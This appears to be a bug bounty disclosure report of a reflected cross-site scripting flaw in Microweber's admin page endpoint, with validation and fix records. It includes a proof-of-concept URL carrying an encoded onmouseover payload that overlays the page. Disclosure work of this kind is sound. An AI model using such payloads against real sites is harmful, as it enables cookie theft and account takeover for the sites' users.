Cross-site Scripting (XSS) - Reflected in microweber/microweber

Valid

Reported on

Feb 19th 2022


Description

Hi, The endpoint https://demo.microweber.org/demo/admin/page is vulnerable to Cross Site Scripting.

Proof of Concept

  1. just navigate to the poc url: https://demo.microweber.org/demo/admin/page/8tojh1%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22yrr2n/edit

  2. now move your mouse on the page, you will see a xss popup.

(login if site asks)

Impact

Cross site scripting attacks can lead to account takeover via cookie stealing, temporary site deface, redirecting users to attackers controlled sites etc.

We are processing your report and will contact the microweber team within 24 hours. 3 months ago
Peter Ivanov validated this vulnerability 3 months ago
Damanpreet has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on f7f5d4 3 months ago
Peter Ivanov has been awarded the fix bounty
to join this conversation